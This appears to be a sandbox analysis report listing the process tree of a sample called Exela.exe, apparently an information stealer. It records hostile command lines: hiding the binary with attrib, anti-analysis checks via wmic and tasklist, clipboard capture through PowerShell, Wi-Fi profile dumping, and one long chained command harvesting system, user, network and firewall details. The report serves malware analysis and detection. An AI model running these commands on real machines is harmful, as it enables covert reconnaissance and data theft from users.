                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "gdb --version"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic computersystem get Manufacturer
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 03:20:10
Start date: 28/10/2024
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist
Imagebase: 0x7ff792ef0000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 03:20:11
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 03:20:11
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 03:20:11
Start date: 28/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path Win32_ComputerSystem get Manufacturer
Imagebase: 0x7ff73e070000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 03:20:12
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 03:20:12
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 03:20:12
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 03:20:12
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 03:20:13
Start date: 28/10/2024
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist
Imagebase: 0x7ff792ef0000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 03:20:13
Start date: 28/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic csproduct get uuid
Imagebase: 0x7ff73e070000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 03:20:13
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                  Start time:03:20:13
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7e4960000
                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c chcp
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff792ef0000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp
Imagebase: 0x7ff694920000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe Get-Clipboard
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c chcp
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 03:20:15
Start date: 28/10/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp
Imagebase: 0x7ff694920000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:systeminfo
                                                                                                                                                                                                                                  Imagebase:0x7ff6ddcc0000
                                                                                                                                                                                                                                  File size:110'080 bytes
                                                                                                                                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                  Imagebase:0x7ff6d3e40000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff717f30000
                                                                                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                  Start time:03:20:17
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:hostname
                                                                                                                                                                                                                                  Imagebase:0x7ff642700000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                  Start time:03:20:17
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic logicaldisk get caption,description,providername
Imagebase:0x7ff73e070000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:03:20:18
Start date:28/10/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net user
Imagebase:0x7ff6c8ac0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:03:20:18
Start date:28/10/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 user
Imagebase:0x7ff6cb310000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:03:20:18
Start date:28/10/2024
Path:C:\Windows\System32\query.exe
Wow64 process (32bit):false
Commandline:query user
Imagebase:0x7ff750bf0000
File size:17'408 bytes
MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:03:20:18
Start date:28/10/2024
Path:C:\Windows\System32\quser.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\quser.exe"
Imagebase:0x7ff611410000
File size:25'600 bytes
MD5 hash:480868AEBA9C04CA04D641D5ED29937B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:03:20:18
Start date:28/10/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net localgroup
Imagebase:0x7ff6c8ac0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:03:20:18
Start date:28/10/2024
